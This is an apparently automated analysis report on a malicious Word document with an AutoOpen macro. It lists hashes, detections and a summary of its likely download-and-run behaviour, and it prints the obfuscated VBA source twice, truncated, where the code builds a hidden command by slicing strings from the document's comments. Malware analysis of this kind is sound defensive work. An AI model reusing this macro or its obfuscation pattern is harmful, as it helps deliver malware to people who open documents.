Office (OLE) malware analysis — malicious · 13a87b7ad809337b

MALICIOUS

Office (OLE)

76.0 KB Created: 2017-10-12 18:48:00 Authoring application: Microsoft Office Word First seen: 2017-10-28

MD5: 5f04521febc6fd82c896a192a3b2bf43 SHA-1: f03929c66b6be9ce1e42a1e06f8706d3432bf5a6 SHA-256: 13a87b7ad809337b02fbe71b554a6dd93e0cb9544486aa636f271b932765651e

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The macro utilizes a Shell() call, indicating an attempt to execute an external command. This behavior strongly suggests the document is designed to download and execute a secondary payload, aligning with common malware delivery tactics.

Heuristics 7

ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6379 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6379 bytes
SHA-256: `567016888208b6e43d6d992861ce39d43df3126eb4593b0f8c99e8ce90a5c340`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub FDaKXMCaL() TNmnzMtcP = "" + HBoZZwoN + KKavLLs + izjzlBXv + WRTooNCV + "coMments" + HBoZZwoN + KKavLLs + izjzlBXv + WRTooNCV + UiaOljp + OEiSQO + qTzMzWA + diaXuq + bUiHBiZ cEGmTkFXzc = Right(Left((fDNWIiius(TNmnzMtcP)), 16987), 116) KiDiuoujQ = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 1981), 99) kQBcztw = Mid((fDNWIiius(TNmnzMtcP)), 7172, 185) coOPSYPMM = Mid((fDNWIiius(TNmnzMtcP)), 14956, 132) YYPpCX = Mid((fDNWIiius(TNmnzMtcP)), 14092, 88) dJhYzoV = Right(Left((fDNWIiius(TNmnzMtcP)), 10840), 151) HIiBprC = Right(Left((fDNWIiius(TNmnzMtcP)), 1317), 116) nLVZhUH = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 11572), 23) XvPRbz = cEGmTkFXzc + KiDiuoujQ + kQBcztw + coOPSYPMM + YYPpCX + dJhYzoV + HIiBprC + nLVZhUH EiKih = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 8243), 38) jjquDcN = Mid((fDNWIiius(TNmnzMtcP)), 788, 152) zJWEiinUj = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 6271), 153) GBMOTb = Mid((fDNWIiius(TNmnzMtcP)), 2598, 155) dIIintq = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 7469), 117) ndnftWVqpBN = XvPRbz + EiKih + jjquDcN + zJWEiinUj + GBMOTb + dIIintq XbbcAznVo = Mid((fDNWIiius(TNmnzMtcP)), 5259, 140) KrsmjcZaH = Right(Left((fDNWIiius(TNmnzMtcP)), 4888), 10) bniFumSHQ = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 4311), 49) JSZKcukLR = Right(Left((fDNWIiius(TNmnzMtcP)), 2382), 109) wifcEG = Right(Left((fDNWIiius(TNmnzMtcP)), 9409), 32) fFSoAnuvDA = Right(Left((fDNWIiius(TNmnzMtcP)), 16837), 147) OBdiaNZzf = Right(Left((fDNWIiius(TNmnzMtcP)), 4808), 56) ztTqzZRiLhc = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 18060), 157) NItvEz = ndnftWVqpBN + XbbcAznVo + KrsmjcZaH + bniFumSHQ + JSZKcukLR + wifcEG + fFSoAnuvDA + OBdiaNZzf + ztTqzZRiLhc ZIpJVujwu = Right(Left((fDNWIiius(TNmnzMtcP)), 14629), 36) SrzlwCrvoC = Right(Left((fDNWIiius(TNmnzMtcP)), 18962), 162) IljlavucO = Right(Left((fDNWIiius(TNmnzMtcP)), 15856), 165) IUNSUjsZn = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 4844), 7) sWJHzCFGDiI = Mid((fDNWIiius(TNmnzMtcP)), 11981, 65) zsXbM = NItvEz + ZIpJVujwu + SrzlwCrvoC + IljlavucO + IUNSUjsZn + sWJHzCFGDiI jWMvcdDNs = Mid((fDNWIiius(TNmnzMtcP)), 12130, 16) SwsXHnzz = Mid((fDNWIiius(TNmnzMtcP)), 5006, 67) ujamYokYR = Mid((fDNWIiius(TNmnzMtcP)), 7029, 119) pMSiuHB = Right(Left((fDNWIiius(TNmnzMtcP)), 10602), 36) SfYjnDHU = Right(Left((fDNWIiius(TNmnzMtcP)), 7608), 5) NrZDpnlJEp = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 3701), 100) bDJdlZpNjz = Mid((fDNWIiius(TNmnzMtcP)), 10395, 163) OOKtwVj = Mid((fDNWIiius(TNmnzMtcP)), 9090, 11) dvbPJc = Right(Left((fDNWIiius(TNmnzMtcP)), 12395), 53) wzpGcE = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 6447), 61) KRhfBHPW = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 10048), 143) bdrKjICjzI = Mid((fDNWIiius(TNmnzMtcP)), 359, 191) bzvEhA = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 11140), 156) lJpWoD = Right(Left((fDNWIiius(TNmnzMtcP)), 8742), 91) HVjEJVARR = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 4213), 86) jDwGMo = Mid((fDNWIiius(TNmnzMtcP)), 17531, 125) kkzaPrtCRn = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 728), 58) jJSZbbi = Mid((fDNWIiius(TNmnzMtcP)), 2851, 160) wdmsn = Right(Left((fDNWIiius(TNmnzMtcP)), 5159), 39) pDdirN = Mid((fDNWIiius(TNmnzMtcP)), 17327, 181) JvQMP = Mid((fDNWIiius(TNmnzMtcP)), 11657, 50) iwSjXlWik = Right(Left((fDNWIiius(TNmnzMtcP)), 12571), 30) jnGKhcukMOJ = Right(Left((fDNWIiius(TNmnzMtcP)), 6887), 151) SuSPfLRno = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmn ... (truncated)

SHA-256: 567016888208b6e43d6d992861ce39d43df3126eb4593b0f8c99e8ce90a5c340

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Sub FDaKXMCaL()
TNmnzMtcP = "" + HBoZZwoN + KKavLLs + izjzlBXv + WRTooNCV + "coMments" + HBoZZwoN + KKavLLs + izjzlBXv + WRTooNCV + UiaOljp + OEiSQO + qTzMzWA + diaXuq + bUiHBiZ
cEGmTkFXzc = Right(Left((fDNWIiius(TNmnzMtcP)), 16987), 116)
KiDiuoujQ = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 1981), 99)
kQBcztw = Mid((fDNWIiius(TNmnzMtcP)), 7172, 185)
coOPSYPMM = Mid((fDNWIiius(TNmnzMtcP)), 14956, 132)
YYPpCX = Mid((fDNWIiius(TNmnzMtcP)), 14092, 88)
dJhYzoV = Right(Left((fDNWIiius(TNmnzMtcP)), 10840), 151)
HIiBprC = Right(Left((fDNWIiius(TNmnzMtcP)), 1317), 116)
nLVZhUH = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 11572), 23)
XvPRbz = cEGmTkFXzc + KiDiuoujQ + kQBcztw + coOPSYPMM + YYPpCX + dJhYzoV + HIiBprC + nLVZhUH
EiKih = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 8243), 38)
jjquDcN = Mid((fDNWIiius(TNmnzMtcP)), 788, 152)
zJWEiinUj = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 6271), 153)
GBMOTb = Mid((fDNWIiius(TNmnzMtcP)), 2598, 155)
dIIintq = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 7469), 117)
ndnftWVqpBN = XvPRbz + EiKih + jjquDcN + zJWEiinUj + GBMOTb + dIIintq
XbbcAznVo = Mid((fDNWIiius(TNmnzMtcP)), 5259, 140)
KrsmjcZaH = Right(Left((fDNWIiius(TNmnzMtcP)), 4888), 10)
bniFumSHQ = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 4311), 49)
JSZKcukLR = Right(Left((fDNWIiius(TNmnzMtcP)), 2382), 109)
wifcEG = Right(Left((fDNWIiius(TNmnzMtcP)), 9409), 32)
fFSoAnuvDA = Right(Left((fDNWIiius(TNmnzMtcP)), 16837), 147)
OBdiaNZzf = Right(Left((fDNWIiius(TNmnzMtcP)), 4808), 56)
ztTqzZRiLhc = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 18060), 157)
NItvEz = ndnftWVqpBN + XbbcAznVo + KrsmjcZaH + bniFumSHQ + JSZKcukLR + wifcEG + fFSoAnuvDA + OBdiaNZzf + ztTqzZRiLhc
ZIpJVujwu = Right(Left((fDNWIiius(TNmnzMtcP)), 14629), 36)
SrzlwCrvoC = Right(Left((fDNWIiius(TNmnzMtcP)), 18962), 162)
IljlavucO = Right(Left((fDNWIiius(TNmnzMtcP)), 15856), 165)
IUNSUjsZn = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 4844), 7)
sWJHzCFGDiI = Mid((fDNWIiius(TNmnzMtcP)), 11981, 65)
zsXbM = NItvEz + ZIpJVujwu + SrzlwCrvoC + IljlavucO + IUNSUjsZn + sWJHzCFGDiI
jWMvcdDNs = Mid((fDNWIiius(TNmnzMtcP)), 12130, 16)
SwsXHnzz = Mid((fDNWIiius(TNmnzMtcP)), 5006, 67)
ujamYokYR = Mid((fDNWIiius(TNmnzMtcP)), 7029, 119)
pMSiuHB = Right(Left((fDNWIiius(TNmnzMtcP)), 10602), 36)
SfYjnDHU = Right(Left((fDNWIiius(TNmnzMtcP)), 7608), 5)
NrZDpnlJEp = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 3701), 100)
bDJdlZpNjz = Mid((fDNWIiius(TNmnzMtcP)), 10395, 163)
OOKtwVj = Mid((fDNWIiius(TNmnzMtcP)), 9090, 11)
dvbPJc = Right(Left((fDNWIiius(TNmnzMtcP)), 12395), 53)
wzpGcE = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 6447), 61)
KRhfBHPW = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 10048), 143)
bdrKjICjzI = Mid((fDNWIiius(TNmnzMtcP)), 359, 191)
bzvEhA = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 11140), 156)
lJpWoD = Right(Left((fDNWIiius(TNmnzMtcP)), 8742), 91)
HVjEJVARR = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 4213), 86)
jDwGMo = Mid((fDNWIiius(TNmnzMtcP)), 17531, 125)
kkzaPrtCRn = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 728), 58)
jJSZbbi = Mid((fDNWIiius(TNmnzMtcP)), 2851, 160)
wdmsn = Right(Left((fDNWIiius(TNmnzMtcP)), 5159), 39)
pDdirN = Mid((fDNWIiius(TNmnzMtcP)), 17327, 181)
JvQMP = Mid((fDNWIiius(TNmnzMtcP)), 11657, 50)
iwSjXlWik = Right(Left((fDNWIiius(TNmnzMtcP)), 12571), 30)
jnGKhcukMOJ = Right(Left((fDNWIiius(TNmnzMtcP)), 6887), 151)
SuSPfLRno = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmn
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.